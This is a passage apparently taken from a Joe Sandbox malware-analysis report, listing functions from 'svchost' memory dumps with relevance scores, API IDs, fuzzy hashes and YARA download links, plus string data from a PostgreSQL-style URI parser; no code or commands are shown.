                                                                                            • API String ID: 2363558997-1518001504
                                                                                            • Opcode ID: 05971cc122452bfdb95474274993fb97959bc8ad436ddf8ec811c83580974c45
                                                                                            • Instruction ID: 34985b23516f4a320b42e3e93277ec3d08021c7d8aad032aff2ee776be144709
                                                                                            • Opcode Fuzzy Hash: 05971cc122452bfdb95474274993fb97959bc8ad436ddf8ec811c83580974c45
                                                                                            • Instruction Fuzzy Hash: D9228D62F0AB9285FA04DB50A8202F967B2EB45748F482436DE4D27797DF3EE544C748
                                                                                            Function 660043A0 Relevance: 79.7, APIs: 53, Instructions: 194COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 13ff4a3754904bbb3bc8dbc8bdd4b0076ab3b4567bd63c3a52ad1bceb12f0298
                                                                                            • Instruction ID: 144799cc570f6e4d55c58561d97e9216be06939be2c9a6909c1f5fe64adfa8d5
                                                                                            • Opcode Fuzzy Hash: 13ff4a3754904bbb3bc8dbc8bdd4b0076ab3b4567bd63c3a52ad1bceb12f0298
                                                                                            • Instruction Fuzzy Hash: CA41F252AAE15AAFA111BBF85CA836EAF408B6335DBC57F32D95C07340DBDDCC819211
                                                                                            Function 660044C0 Relevance: 78.2, APIs: 52, Instructions: 224COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 09338269764657c19c985b91da17a14dff50020c0064e21fac87f267f10655d2
                                                                                            • Instruction ID: fa0d6515a5041b6f437e78e619b860929a54b0d8984f62474ae614817fe1094e
                                                                                            • Opcode Fuzzy Hash: 09338269764657c19c985b91da17a14dff50020c0064e21fac87f267f10655d2
                                                                                            • Instruction Fuzzy Hash: F5518E659AE119AFA610EBE448A876EAF51DB6334EBC07F33D50C43305DBEDCC858205
                                                                                            Function 66004680 Relevance: 75.2, APIs: 50, Instructions: 169COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 0795e0ff7e3c7c0d41e883caee80865a1448dfe7e56efcdf7d589bc7be18fe08
                                                                                            • Instruction ID: 51b1fb3618322b24287c5ee3c0dd4d3e5d4fc51681ee0a5299448747c72eac5f
                                                                                            • Opcode Fuzzy Hash: 0795e0ff7e3c7c0d41e883caee80865a1448dfe7e56efcdf7d589bc7be18fe08
                                                                                            • Instruction Fuzzy Hash: 9631DC11AAE06A9BA211E7F858A836EAF00CF6735CBC03F32D95C07380DBDDCC458241
                                                                                            Function 66004770 Relevance: 73.7, APIs: 49, Instructions: 203COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ce1edefbcfe34fea2495cb283717aa6de781e3f5592bdae044f66344c2262727
                                                                                            • Instruction ID: 5357dbd7bce86d55a15de6e9f1701ad1535d6657fd58090d9f67bfd37e9c051f
                                                                                            • Opcode Fuzzy Hash: ce1edefbcfe34fea2495cb283717aa6de781e3f5592bdae044f66344c2262727
                                                                                            • Instruction Fuzzy Hash: 8E512D619AE15A9BE210E7E488A876EAF54EB17348BC07F33D50C43344CBEDDC818785
                                                                                            Function 66004AA0 Relevance: 70.7, APIs: 47, Instructions: 162COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ffbe3ab80a2a4ad7ccdc522cdf97218cc7837a75b5a4f5e1deaa7753c65576ea
                                                                                            • Instruction ID: 8d3c3548f0e74ea16501d1cff62c475dc3b3b55bc18b8867432cd0e63ca89b13
                                                                                            • Opcode Fuzzy Hash: ffbe3ab80a2a4ad7ccdc522cdf97218cc7837a75b5a4f5e1deaa7753c65576ea
                                                                                            • Instruction Fuzzy Hash: 8731DE612AA15A8BA200EBF99CA83BEAF51DF1775DBC07F33D51C43394CBA9CC419204
                                                                                            Function 66004C60 Relevance: 69.1, APIs: 46, Instructions: 133COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 8bc10ce64063221e8887b85e34a5ce62e8ab18b25c7980e5225a7fc90194eb4c
                                                                                            • Instruction ID: d8d428209b474f962ab5baa2e3c27ca8521fc32d95ffd1db33ddbd7b7e271840
                                                                                            • Opcode Fuzzy Hash: 8bc10ce64063221e8887b85e34a5ce62e8ab18b25c7980e5225a7fc90194eb4c
                                                                                            • Instruction Fuzzy Hash: D7211D62AAE05A9BA650A7F85CA9B6EDF408F6334C7C43F33C51C87B808B8CCD455256
                                                                                            Function 00007FFDA36D8A50 Relevance: 68.7, APIs: 13, Strings: 26, Instructions: 428stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_errno_strdup$libintl_dgettextmallocstrcmp
                                                                                            • String ID: :$?$@$@$@$IPv6 host address may not be empty in URI: "%s"$]$dbname$end of string reached when looking for matching "]" in IPv6 host address in URI: "%s"$extra key/value separator "=" in URI query parameter: "%s"$host$invalid URI propagated to internal parser routine: "%s"$invalid URI query parameter: "%s"$invalid connection option "%s"$missing key/value separator "=" in URI query parameter: "%s"$out of memory$password$port$prefer$require$requiressl$ssl$sslmode$true$unexpected character "%c" at position %d in URI (expected ":" or "/"): "%s"$user
                                                                                            • API String ID: 325725218-894359435
                                                                                            • Opcode ID: 3786fe3d99ac28ea43d40841bfe94f4e85d2eeab9430298346db012d0fc38ff7
                                                                                            • Instruction ID: e992ee71fd2cb61e5ce7b5f12c6f1db4830f54ebbb2a41221cd42d85a2eb1535
                                                                                            • Opcode Fuzzy Hash: 3786fe3d99ac28ea43d40841bfe94f4e85d2eeab9430298346db012d0fc38ff7
                                                                                            • Instruction Fuzzy Hash: 3B028353B0FA8244FB658725A4383792B93AF52BC4F4C6031DA4D263DBDE6EE445C309
                                                                                            Function 66009200 Relevance: 64.6, APIs: 43, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 6cfd3f1bd986bb4813897892ad6781e1333348a5243eecd47d0186c0da29410f
                                                                                            • Instruction ID: 8d87d456ef5ac181f92fbdd219d4066359fda4d9eb55b802f7f1e570d41f5126
                                                                                            • Opcode Fuzzy Hash: 6cfd3f1bd986bb4813897892ad6781e1333348a5243eecd47d0186c0da29410f
                                                                                            • Instruction Fuzzy Hash: 682140159AE16A8B9611E3F888A83AEEF408F5735CBC43F33D95C477408BCCCD419612
                                                                                            Function 00007FFDA36D9330 Relevance: 63.9, APIs: 51, Instructions: 174COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: 9186718d952aa99ffdd076691540635cd7a8686958ebc2398125b42f5949b570
                                                                                            • Instruction ID: 9358606cd1695a783c4c098ae4817f922bbcdb5f5d6e0a48e403a9552a2d042d
                                                                                            • Opcode Fuzzy Hash: 9186718d952aa99ffdd076691540635cd7a8686958ebc2398125b42f5949b570
                                                                                            • Instruction Fuzzy Hash: 8FA1553671AB8282EB409F65D8642B92321FB88F95F0C1571CE4E5B376CF39D489C314
                                                                                            Function 66009280 Relevance: 63.1, APIs: 42, Instructions: 119COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: d8c961ebe3d96005e1e7cb12c024be23ded126365af48719a012c2dcda9bed48
                                                                                            • Instruction ID: b7dec439ced0ecbe3f419c54e9c6b113f702e0f900362b7b9c8425252f4a7f72
                                                                                            • Opcode Fuzzy Hash: d8c961ebe3d96005e1e7cb12c024be23ded126365af48719a012c2dcda9bed48
                                                                                            • Instruction Fuzzy Hash: 462141159AE16A8B9611E3F888A83AEEF408B4735CBC43F33D95C477818BCCCD455612
                                                                                            Function 66009350 Relevance: 61.8, APIs: 41, Instructions: 257COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6558b8c8933c0e36cb30fba0b2db9598aa34130188afadd4f445023fd4452698
                                                                                            • Instruction ID: 0fdfcdc734d7ace8ed8c737e2634af43f41844cb29366d9ddab5af152c8eb2a0
                                                                                            • Opcode Fuzzy Hash: 6558b8c8933c0e36cb30fba0b2db9598aa34130188afadd4f445023fd4452698
                                                                                            • Instruction Fuzzy Hash: 78611757A6D1568BE311B7F8D8543AEAF41D796319FC86A32D90CC73D0EAADCD42C201
                                                                                            Function 6600B200 Relevance: 60.2, APIs: 40, Instructions: 185COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a241de8457207be6930be8d2d6a9e2710f79a7ebfbebfe2260c74af84ddae04c
                                                                                            • Instruction ID: e4d63cce666024b07f9ecd7fd5b0aa7191692adaa9c908989be0792d7255a48e
                                                                                            • Opcode Fuzzy Hash: a241de8457207be6930be8d2d6a9e2710f79a7ebfbebfe2260c74af84ddae04c
                                                                                            • Instruction Fuzzy Hash: AB417E129BE05A4BA211A7F45CA876FEF809B4779CBC03E33D91C47784CBADCD829605
                                                                                            Function 6600B790 Relevance: 58.7, APIs: 39, Instructions: 190COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8ea22d2773a379d4a85fa27f17693d0336c972e6f647331039f8f4a9fd4a2e7a
                                                                                            • Instruction ID: 337d000ac771031f01e877c59559def919b689d8d4ad366af12fae2953345046
                                                                                            • Opcode Fuzzy Hash: 8ea22d2773a379d4a85fa27f17693d0336c972e6f647331039f8f4a9fd4a2e7a
                                                                                            • Instruction Fuzzy Hash: 9641901297E05A4EA211ABF858A837EEF419B43369BC47F32DA5847391DBEDCC81C301
                                                                                            Function 6600B900 Relevance: 57.2, APIs: 38, Instructions: 207COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: abb85ffd75dfc4c51a1628734e1645f799ba93206ce970b32ae7857fff317970
                                                                                            • Instruction ID: 694fa6c9d4643f6d946a97a9f71ef78ebd9c9738f251591e168e293483714027
                                                                                            • Opcode Fuzzy Hash: abb85ffd75dfc4c51a1628734e1645f799ba93206ce970b32ae7857fff317970
                                                                                            • Instruction Fuzzy Hash: 5F51965297E0498AA21197F458A836EDF509B5736DFD43F33DA69473D0DBADCC81C201
                                                                                            Function 6600BAC0 Relevance: 55.7, APIs: 37, Instructions: 210COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 18e5691760aaae4a02e7d207611ff62389cc034f305a815a953a0a764a8cdd22
                                                                                            • Instruction ID: ffdc7b6787f8aab1badcf005d9190fc0e98897cc595e7138c365454bb6ca6b33
                                                                                            • Opcode Fuzzy Hash: 18e5691760aaae4a02e7d207611ff62389cc034f305a815a953a0a764a8cdd22
                                                                                            • Instruction Fuzzy Hash: A551A51297D0494BA221A7F45CA436EEF51AB4736DBD43F33DA68473D4DBADCD828201
                                                                                            Function 6600CF80 Relevance: 52.7, APIs: 35, Instructions: 241COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 29ef229ea1c0d00c17e05e61b70288c5814ac060b99a7c25f25aa1e0e69b4c84
                                                                                            • Instruction ID: eda0982c2952a9a802fe652290a126da01fdf19940dd64b9a0f166618374c4d2
                                                                                            • Opcode Fuzzy Hash: 29ef229ea1c0d00c17e05e61b70288c5814ac060b99a7c25f25aa1e0e69b4c84
                                                                                            • Instruction Fuzzy Hash: FE514CA256D1954FE211D7F898A836FBF519B1334CBC02E32DA69477C0DAAECC42C721
